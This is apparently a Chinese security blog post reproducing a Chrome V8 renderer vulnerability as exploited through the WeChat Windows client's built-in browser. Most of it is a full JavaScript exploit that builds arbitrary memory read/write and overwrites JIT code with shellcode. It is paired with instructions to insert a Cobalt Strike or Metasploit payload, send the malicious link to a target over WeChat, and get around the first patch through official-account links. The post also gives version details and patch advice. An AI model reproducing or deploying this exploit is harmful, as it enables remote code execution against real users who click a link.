微信(Chrome)漏洞复现与简单分析小结

• https://wuchendi.gitee.io/chrome/index.html

2、漏洞复现 这里微信的利用方式与Chrome差不多，就不再详细写具体步骤了，只需要将以下EXP中的第5行shellcode替换为我们CS或MSF生成的32位C# Payload即可。 ENABLE_LOG = true; IN_WORKER = true; // run calc and hang in a loop var shellcode = [ ]; function print(data) { } var not_optimised_out = 0; var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12; }); for (var i = 0; i < 0x10000; ++i) { target_function(i); } var g_array; var tDerivedNCount = 17 * 87481 - 8; var tDerivedNDepth = 19 * 19; function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f'; } function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); } } function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. ); // this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } // try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this; } function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0); } try{ print("start running"); trigger(); }catch(e){ print(e); } 然后通过微信将我们精心构造的恶意链接发给对方，等待他点击该链接后即可成功得到目标主机会话。 注：我物理机的微信2.6是在Microsoft Store安装的，用的也是Chrome内核，并且关闭了沙盒，但是不知为什么无法复现，可能是这个版本不受Chrome漏洞影响，或者是我个人环境有问题！ 0x04 新版微信更新什么 1、4.2.1.143 这是爆出漏洞后的第一次更新，临时关闭了微信内置浏览器，采取白名单方式进行验证，仅允许*.weixin.qq.com白名单域名通过内置浏览器打开，但是依旧没有开启沙盒，所以我们还可以通过公众号的阅读原文等方式来访问恶意链接上线CS/MSF。 通过对微信44和143两个版本chrome://version对比发现只是升级了CEF框架版本和加载了相关资源文件，其他并没有太大变化，主要几个相关文件如下，可以通过以下命令查看文件详细信息。 wmic datafile where Name='C:\\Program Files (x86)\\Tencent\\WeChat\\qbcore.dll' get Name,Version WeChatWin.dll //Windows微信版本文件 qbcore.dll //CEF版本文件，44（1320），143（1326） CefResources.data //CEF资源文件，44（2585），143（2587） 2、4.2.1.151 这是爆出漏洞后的第二次更新，基本上已经完全修复了这个漏洞，升级了微信版本、暂时不用wechatweb.exe做为内置浏览器（不过文件还在，说不定还会用）、删除禁用沙盒--no-sandbox参数等，目前在线升级只能到143，151需要通过官网下载。 0x05 修复建议

1. 升级Chrome浏览器为最新版本（90.0.4430.72）；
2. 升级Windows微信为最新版本（3.2.1.151）；

关注公众号回复“9527”可免费获取一套HTB靶场文档和视频，“1120”安全参考等安全杂志PDF电子版，“1208”个人常用高效爆破字典，“0221”2020年酒仙桥文章打包，还在等什么？赶紧点击下方名片关注学习吧！ 推 荐 阅 读 欢 迎 私 下 骚 扰